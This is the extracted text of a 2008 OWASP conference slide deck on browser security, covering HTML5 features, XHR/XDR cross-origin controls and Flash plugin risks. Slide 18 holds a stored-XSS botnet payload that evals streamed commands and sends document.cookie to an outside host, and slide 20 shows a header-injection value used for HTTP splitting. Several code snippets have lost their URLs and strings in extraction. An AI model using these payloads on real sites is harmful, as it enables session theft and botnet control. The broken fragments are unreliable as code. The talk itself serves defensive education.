Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Browser Security


Published on

This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.

Published in: Technology
  • Unlock Her Legs(Official) $69 | Get 90% Off + 8 Special Bonus? ▲▲▲
    Are you sure you want to  Yes  No
    Your message goes here
  • ➤➤ 3 Reasons Why You Shouldn't take Pills for ED (important) ★★★
    Are you sure you want to  Yes  No
    Your message goes here

Browser Security

  1. 1. OWASP – Browser Security Roberto Suggi Liverani Security Consultant 3 September 2008
  2. 2. Who am I? <ul><li>Roberto Suggi Liverani </li></ul><ul><li>Security Consultant, CISSP - </li></ul><ul><ul><li>4+ years in information security, focusing on web application and network security </li></ul></ul><ul><ul><li>OWASP New Zealand founder/leader </li></ul></ul>
  3. 3. Agenda <ul><li>Introduction </li></ul><ul><ul><li>A look to the present </li></ul></ul><ul><ul><li>The potential risks </li></ul></ul><ul><li>Some challenges </li></ul><ul><ul><li>HTML 5.0 </li></ul></ul><ul><ul><li>WebApps (XHR) </li></ul></ul><ul><ul><li>Browser Plugins </li></ul></ul><ul><li>OWASP approach to the problem </li></ul><ul><ul><li>OWASP Intrinsic Group </li></ul></ul>
  4. 4. Introduction <ul><li>Present : web security focus is mainly on web apps rather than browsers </li></ul><ul><li>But : browser bugs affect much more users than web application bugs </li></ul>
  5. 5. Introduction <ul><li>Browsers statistics from </li></ul><ul><li>JavaScript statistics </li></ul>
  6. 6. Introduction <ul><li>The risks are not just in the numbers… </li></ul><ul><ul><li>Do you remember “On the job browser exploitation” talk of Mark Piper? </li></ul></ul><ul><li>Technologies evolve: </li></ul><ul><ul><li>HTML5 </li></ul></ul><ul><ul><li>XHR </li></ul></ul><ul><ul><li>Browser Plugin </li></ul></ul><ul><li>Current browser security progress mainly focused on: </li></ul><ul><ul><li>Reflected XSS filtering and CSRF protection </li></ul></ul><ul><ul><li>Phishing web sites detection </li></ul></ul>
  7. 7. Next Challenges <ul><li>HTML5 (W3C working draft) </li></ul><ul><li>New features with a security impact: </li></ul><ul><ul><li>Origin-Policy </li></ul></ul><ul><ul><li>Browsing contexts and navigation </li></ul></ul><ul><ul><li>Custom protocol and content handlers </li></ul></ul><ul><ul><li>Structured client-side storage </li></ul></ul><ul><ul><li>Offline Web applications </li></ul></ul><ul><ul><li>Cross-document messaging </li></ul></ul><ul><ul><li>Server-sent events </li></ul></ul><ul><ul><li>Web sockets </li></ul></ul>
  8. 8. HMTL5 <ul><li>Relaxing Origin-Policy: </li></ul><ul><li>Window objects origin-policy exceptions: </li></ul><ul><ul><li>Location object </li></ul></ul><ul><ul><li>postMessage() </li></ul></ul><ul><ul><li>frames attribute </li></ul></ul><ul><ul><li>XXX4 method </li></ul></ul> XSS Injection document.domain = Communication between 2 subdomains through XSS
  9. 9. HTML5 <ul><li>Browsing Contexts and Navigations </li></ul><ul><ul><li>Opener browsing context – 1.COM </li></ul></ul><ul><ul><li>Auxiliary Browser Context - 3.COM </li></ul></ul><ul><ul><li>Nested browser context - 2.COM </li></ul></ul>Malicious Third party 3.COM (b) Iframe injection src=2.COM 1.COM (vulnerable) Cross Context Scripting between 2.COM and 3.COM (a) Injection in 1.COM of pointing to 3.COM
  10. 10. HTML5 <ul><li>Custom Protocol and content handlers </li></ul><ul><ul><li>registerProtocolHandler() – ftp:, fax:, foo: </li></ul></ul><ul><ul><li>registerContentHandler() – MIME type, text/foo </li></ul></ul>A.COM B.COM <ul><ul><li>navigator.registerContentHandler(‘text/foo', ‘foo?url=%s', ‘foo') </li></ul></ul><ul><ul><li><a>Download </a> </li></ul></ul> served as text/foo redirection to:
  11. 11. HTML5 <ul><li>Hijacking content or protocol handlers </li></ul><ul><ul><li>navigator.registerProtocolHandler(‘HTTPS', ‘foo?url=%s', ‘foo') </li></ul></ul><ul><li>Register Spamming </li></ul><ul><ul><ul><li>Site tries to register multiple protocol/content handlers </li></ul></ul></ul><ul><ul><ul><li>Multiple sites try registering video/mpeg content </li></ul></ul></ul><ul><li>Leaking Intranet URLs </li></ul><ul><ul><ul><li>User registers a certain content handler (text/foo) </li></ul></ul></ul><ul><ul><ul><li>User clicks </li></ul></ul></ul><ul><ul><ul><li>User redirected to external site which handles text/foo </li></ul></ul></ul><ul><li>Leaking HTTPS </li></ul><ul><ul><li>User redirected to site with HTTPS URL </li></ul></ul><ul><li>Leaking credentials in GET Request </li></ul>
  12. 12. HTML5 <ul><li>Structured Client Storage </li></ul><ul><ul><li>sessionStorage (adds data to the session for all pages under same domain) </li></ul></ul><ul><ul><li>localStorage (adds complex data to client’s cache) </li></ul></ul><ul><ul><li>Methods: getItem(), setItem() </li></ul></ul><ul><ul><li>Only protection: origin policy </li></ul></ul><ul><li>SQL, yes SQL!!! – to store more structured data </li></ul><ul><ul><li>Methods: openDatabase(), executeSQL() </li></ul></ul><ul><ul><li>Objects: SQLResultSet, SQLResultSetRowList, SQLError </li></ul></ul><ul><ul><li>More to come on “browser SQL injection”… </li></ul></ul>
  13. 13. HTML5 <ul><li>Client Storage Attack Example (A. Trivero) </li></ul><ul><li>Browser SQL Injection Example (A. Trivero) </li></ul><ul><li>Cross-Directory Attack </li></ul><ul><ul><li>XSS in can read/write data from/to </li></ul></ul><ul><li>User Tracking - UI put in client-storage in multiple sites (marketing, botnet, etc.) </li></ul><ul><li>Cookie Resurrection </li></ul>
  14. 14. HTML5 <ul><li>Offline Web Applications </li></ul><ul><ul><li>Extensive Application Cache API </li></ul></ul><ul><ul><li><manifest></manifest> </li></ul></ul><ul><ul><li>HTTP response with text/cache-manifest MIME type for manifest </li></ul></ul><ul><ul><li>Manifest specifies how specific site content should be cached = application cache policy </li></ul></ul><ul><ul><li>New items can be added to specific cached content with method add() </li></ul></ul><ul><ul><li>Different versions of cached content for the same site </li></ul></ul><ul><ul><li>Application Cache status can be queried: </li></ul></ul><ul><ul><ul><li>Uncached, Idle, Checking, Download, Updateready </li></ul></ul></ul>
  15. 15. HTML5 <ul><li>Application Cache Poisoning </li></ul><ul><ul><li>A.COM’s manifest allows caching of vulnerable HTML page containing DOM XSS </li></ul></ul><ul><ul><li>DOM XSS manipulates data when viewed in off-line mode </li></ul></ul><ul><li>Attacking offline browser </li></ul><ul><ul><li>Off-line application cache content with stored XSS that sets navigator.onLine=TRUE </li></ul></ul>
  16. 16. HTML5 <ul><li>Cross Document Messaging </li></ul><ul><ul><li>“ While this (origin policy) is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile” – 7.4 W3C HTML5 current draft </li></ul></ul><ul><ul><li>postMessage(message, messagePort, targetOrigin) </li></ul></ul><ul><ul><ul><li>window.addEventListener('message', receiver, false); </li></ul></ul></ul><ul><ul><ul><li>function receiver(e) { </li></ul></ul></ul><ul><ul><ul><li>if (e.origin == ' ') { </li></ul></ul></ul><ul><ul><ul><li>if ( == ' Hello world ') { </li></ul></ul></ul><ul><ul><ul><li>e.source.postMessage('Hello', e. origin ); </li></ul></ul></ul><ul><ul><ul><li>} else { </li></ul></ul></ul><ul><ul><ul><li>alert(; </li></ul></ul></ul><ul><ul><ul><li>} } } </li></ul></ul></ul>A.COM B.COM var o = document.getElementsByTagName('iframe')[0]; o.contentWindow.postMessage('Hello world', ''); NOTE: this condition can be omitted or = *
  17. 17. HTML5 <ul><li>Server-Sent Events </li></ul><ul><ul><li>Dispatching DOM events into document that expect it </li></ul></ul><ul><ul><li>RemoteEventTarget used to fetch data sent as EventStream (text/event-stream) from: </li></ul></ul><ul><ul><ul><li>Same site </li></ul></ul></ul><ul><ul><ul><li>Allowed sites (XHR access control) </li></ul></ul></ul><ul><ul><li><eventsource src= onmessage=“var stream;‘ ’); showNews(stream[0],stream[1],stream[2]);”> </li></ul></ul><eventsource> data: data: data: EventStream PULLS
  18. 18. HTML5 <ul><li>Next generation web botnet – C&M interface </li></ul>BOTNET <ul><ul><li>Stored XSS in botnet websites: </li></ul></ul><ul><ul><li><eventsource src= onmessage=“var stream;‘ ’); eval(stream[0],stream[1],stream[2]);”> </li></ul></ul>Data Stream (MIME: text/event-stream) Data: wait(); Data: wait(); Data: document.write(<img src=‘’+document.cookie); Botnet operates following XHR access control for data exchange
  19. 19. HTML5 <ul><li>Web Sockets – websocket(url); </li></ul><ul><li>Botnet scenario applies as well </li></ul>Client at Server at GET ws:// HTTP/1.1 Upgrade: WebSocket Connection: Upgrade Host: Origin: Authorization: Basic d2FsbGU6ZXZl HTTP/1.1 101 Web Socket Protocol Handshake Upgrade: WebSocket Connection: Upgrade WebSocket-Origin: WebSocket-Location: ws:// Data Framing Read/send data byte per byte Data Framing Send/read raw UTF8 data byte per byte Close TCP/IP connection – no handshake Close TCP/IP connection – no handshake
  20. 20. WebApps (XHR) <ul><li>XHR Access Control (GET and POST) </li></ul>Resource: Client: JavaScript + XHR: new client = new XMLHttpRequest();;GET or POST&quot;, &quot;;) client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: Hello World! GET NOTE: the entire access control system relies on HTTP headers So what happens with an HTTP Splitting Attack? JavaScript + XHR: new client = new XMLHttpRequest();;GET or POST&quot;, &quot; %0A%0DAccess-Control-Allow-Origin: &quot;) client.onreadystatechange = function() { /* do something */ } client.send()
  21. 21. WebApps (XHR) <ul><li>XHR Access Control (Other HTTP methods) </li></ul>Resource: Client: JavaScript + XHR: new client = new XMLHttpRequest();“OPTIONS&quot;, &quot;;) client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: Access-Control-Max-Age: 3628800 Preflight Request: OPTIONS JavaScript + XHR: new client = new XMLHttpRequest();“DELETE&quot;, &quot;;) client.onreadystatechange = function() { /* do something */ } client.send() DELETE NOTE: the entire access control system relies on HTTP headers
  22. 22. XHR Alternative – XDR (Xdomain Request) <ul><li>Cross-domain request developed by Microsoft </li></ul>Resource: Client: JavaScript + XDR: xdr = new XDomainRequest();“GET&quot;, “;) HTTP Response: XDomainRequestAllowed=1 Hello! GET HTTP Request: GET /xdr.txt XDomainRequest: 1 Host: NOTE: the entire XDR relies on HTTP headers
  23. 23. Browser Plugins <ul><li>Adobe Flash </li></ul><ul><ul><li>LSO (Local Shared Objects) </li></ul></ul><ul><ul><li>Cookie system completely managed by Adobe </li></ul></ul><ul><ul><ul><li>100KB cache data allowed by default </li></ul></ul></ul><ul><ul><ul><li>Third Party LSO are allowed by default (100kb cache) </li></ul></ul></ul><ul><ul><li>LSO data stored and accessed “stealthily” </li></ul></ul><ul><ul><li>Typically stored in: </li></ul></ul><ul><ul><ul><li>C:Documents and Settings[username]Application DataMacromediaFlash Player </li></ul></ul></ul><ul><ul><ul><li>Files in the format .sol </li></ul></ul></ul><ul><ul><li>This “feature” has already been exploited: </li></ul></ul><ul><ul><ul><li>United Virtualies -> PIE (Persistent Identification Element) </li></ul></ul></ul><ul><ul><ul><li>Creates a unique ID for each browser and then stores in LSO </li></ul></ul></ul>
  24. 24. Browser Plugins <ul><li>ActionScript FileReference.Download bypasses browser security settings </li></ul><ul><ul><ul><li>IKAT’s Paul Craig 0day technique to bypass kiosk software protection (IE’s security model) </li></ul></ul></ul><ul><ul><ul><li>Something like: </li></ul></ul></ul>test.addEventListener(MouseEvent.CLICK, downloadFile); var fileRef:FileReference = new FileReference(); function downloadFile(event:MouseEvent):void { URLRequest(&quot;;), “file.html&quot;); }
  25. 25. OWASP Intrinsic Group <ul><li>Aid browser vendors, framework vendors in addressing current security issues </li></ul><ul><li>Focus on: </li></ul><ul><ul><ul><li>HTML5 Working Group </li></ul></ul></ul><ul><ul><ul><li>XMLHTTPRequest </li></ul></ul></ul><ul><ul><ul><li>Webapp Working Group </li></ul></ul></ul><ul><ul><ul><li>Mozilla Firefox </li></ul></ul></ul><ul><ul><ul><li>Adobe (AIR/Flash) </li></ul></ul></ul><ul><ul><ul><li>Microsoft IE7 </li></ul></ul></ul><ul><ul><ul><li>Microsoft .NET </li></ul></ul></ul><ul><ul><ul><li>Struts </li></ul></ul></ul><ul><ul><ul><li>Spring </li></ul></ul></ul><ul><ul><ul><li>Apache Commons </li></ul></ul></ul><ul><li>Soon: OWASP Top Ten Browser Security </li></ul>
  26. 26. Questions? <ul><li>[email_address] </li></ul><ul><li> </li></ul><ul><li> </li></ul>
  27. 27. References <ul><li>HTML5 </li></ul><ul><ul><li> </li></ul></ul><ul><li>XHR and XHR Level 2 </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><li>Access Controls XHR </li></ul><ul><ul><li> </li></ul></ul><ul><li>XDR </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><li>LSO </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul>
  28. 28. References <ul><li>HTML5 - Presentation </li></ul><ul><ul><li> </li></ul></ul><ul><li>Abusing HTML 5 Structured Client-side Storage </li></ul><ul><ul><li> </li></ul></ul><ul><li>Web Stats </li></ul><ul><ul><li> </li></ul></ul><ul><li>Browser Stats </li></ul><ul><ul><li> </li></ul></ul>